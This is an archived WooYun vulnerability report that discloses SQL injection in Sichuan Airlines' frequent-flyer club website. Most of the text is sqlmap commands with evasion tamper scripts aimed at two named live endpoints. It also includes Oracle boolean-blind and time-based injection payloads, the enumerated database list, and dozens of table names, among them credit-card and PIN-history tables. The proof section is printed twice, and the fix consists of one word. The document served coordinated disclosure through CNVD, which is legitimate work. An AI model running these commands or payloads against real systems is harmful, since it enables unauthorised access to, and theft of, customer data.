当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089008

漏洞标题:四川航空某业务多处SQL处注入

相关厂商:四川航空

漏洞作者: 玉林嘎

提交时间:2014-12-27 22:34

修复时间:2015-02-10 22:36

公开时间:2015-02-10 22:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-10: 细节向公众公开

简要描述:

rt

详细说明:

http://ffp.scal.com.cn/FFPNewWeb/
四川航空会员俱乐部

1.jpg


2个查询 每个参数都存在注入
1、
sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: POST
Parameter: AirlineCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1
---
[20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:05:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCAR
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables

[20:31:16] [INFO] fetching number of tables for database 'SCAR'
[20:31:16] [INFO] resumed: 373
[20:31:16] [INFO] resumed: TBL_20110831_PRO
[20:31:16] [INFO] resuming partial value: BCK
[20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:31:16] [INFO] retrieved: _LOG
[20:31:52] [INFO] retrieved: CJ_DLYP
[20:33:02] [INFO] retrieved: CJ_DLYPTMP
[20:33:44] [INFO] retrieved: CJ_ERRDES
[20:34:56] [INFO] retrieved: CJ_FLGAP
[20:35:58] [INFO] retrieved: CJ_FLGAT
[20:36:31] [INFO] retrieved: CJ_FLGAT_HIS
[20:37:35] [INFO] retrieved: CJ_FLTCN
[20:38:23] [INFO] retrieved: CJ_FLTCNTMP
[20:39:07] [INFO] retrieved: CJ_FLTCNTMQ
[20:39:41] [INFO] retrieved: CJ_IRFLP
[20:40:45] [INFO] retrieved: CJ_IRFLPTMP
[20:41:40] [INFO] retrieved: CJ_IRFLPTMQ
[20:42:14] [INFO] retrieved: CJ_IRFLP_BAK
[20:43:17] [INFO] retrieved: CJ_IRFLP_HIS
[20:44:07] [INFO] retrieved: CJ_OPDES
[20:45:04] [INFO] retrieved: CJ_OPERATORS
[20:46:16] [INFO] retrieved: CJ_OPGAT
[20:46:57] [INFO] retrieved: CJ_PNRPTMP
[20:48:11] [INFO] retrieved: CJ_RECORDNUM
[20:49:39] [INFO] retrieved: CJ_VAFLP
[20:50:40] [INFO] retrieved: CJ_VAFLPTMP
[20:51:27] [INFO] retrieved: PERSON
[20:52:28] [INFO] retrieved: PLAN_TABLE
[20:53:58] [INFO] retrieved: TBL_ACTION
[20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY
[20:57:26] [INFO] retrieved: TBL_AIRLINE
[20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE
[21:00:30] [INFO] retrieved: TBL_AIRPORT
[21:01:21] [INFO] retrieved: TBL_AUDITOR
[21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE
[21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX
[21:07:47] [INFO] retrieved: TBL_CITY
[21:08:29] [INFO] retrieved: TBL_CLASS
[21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE
[21:11:47] [INFO] retrieved: TBL_CLASS_TYPE
[21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT
[21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY
[21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY
[21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM
[21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR
[21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM
[21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS
[21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS
[21:29:01] [INFO] retrieved: TBL_COMPANY_INFO
[21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER
[21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT
[21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM
[21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP
[21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM
[21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY
[21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT
[21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE
[21:47:18] [INFO] retrieved: TBL_COUNTRY
[21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY


2、sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: OrgCity
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CAN
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN
---
[20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:08:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


跟第一个一样的

漏洞证明:

http://ffp.scal.com.cn/FFPNewWeb/
四川航空会员俱乐部

1.jpg


2个查询 每个参数都存在注入
1、
sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: POST
Parameter: AirlineCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1
---
[20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:05:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCAR
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables

[20:31:16] [INFO] fetching number of tables for database 'SCAR'
[20:31:16] [INFO] resumed: 373
[20:31:16] [INFO] resumed: TBL_20110831_PRO
[20:31:16] [INFO] resuming partial value: BCK
[20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:31:16] [INFO] retrieved: _LOG
[20:31:52] [INFO] retrieved: CJ_DLYP
[20:33:02] [INFO] retrieved: CJ_DLYPTMP
[20:33:44] [INFO] retrieved: CJ_ERRDES
[20:34:56] [INFO] retrieved: CJ_FLGAP
[20:35:58] [INFO] retrieved: CJ_FLGAT
[20:36:31] [INFO] retrieved: CJ_FLGAT_HIS
[20:37:35] [INFO] retrieved: CJ_FLTCN
[20:38:23] [INFO] retrieved: CJ_FLTCNTMP
[20:39:07] [INFO] retrieved: CJ_FLTCNTMQ
[20:39:41] [INFO] retrieved: CJ_IRFLP
[20:40:45] [INFO] retrieved: CJ_IRFLPTMP
[20:41:40] [INFO] retrieved: CJ_IRFLPTMQ
[20:42:14] [INFO] retrieved: CJ_IRFLP_BAK
[20:43:17] [INFO] retrieved: CJ_IRFLP_HIS
[20:44:07] [INFO] retrieved: CJ_OPDES
[20:45:04] [INFO] retrieved: CJ_OPERATORS
[20:46:16] [INFO] retrieved: CJ_OPGAT
[20:46:57] [INFO] retrieved: CJ_PNRPTMP
[20:48:11] [INFO] retrieved: CJ_RECORDNUM
[20:49:39] [INFO] retrieved: CJ_VAFLP
[20:50:40] [INFO] retrieved: CJ_VAFLPTMP
[20:51:27] [INFO] retrieved: PERSON
[20:52:28] [INFO] retrieved: PLAN_TABLE
[20:53:58] [INFO] retrieved: TBL_ACTION
[20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY
[20:57:26] [INFO] retrieved: TBL_AIRLINE
[20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE
[21:00:30] [INFO] retrieved: TBL_AIRPORT
[21:01:21] [INFO] retrieved: TBL_AUDITOR
[21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE
[21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX
[21:07:47] [INFO] retrieved: TBL_CITY
[21:08:29] [INFO] retrieved: TBL_CLASS
[21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE
[21:11:47] [INFO] retrieved: TBL_CLASS_TYPE
[21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT
[21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY
[21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY
[21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM
[21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR
[21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM
[21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS
[21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS
[21:29:01] [INFO] retrieved: TBL_COMPANY_INFO
[21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER
[21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT
[21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM
[21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP
[21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM
[21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY
[21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT
[21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE
[21:47:18] [INFO] retrieved: TBL_COUNTRY
[21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY


2、sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: OrgCity
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CAN
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN
---
[20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:08:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


跟第一个一样的

修复方案:

过滤

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-12-31 17:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评论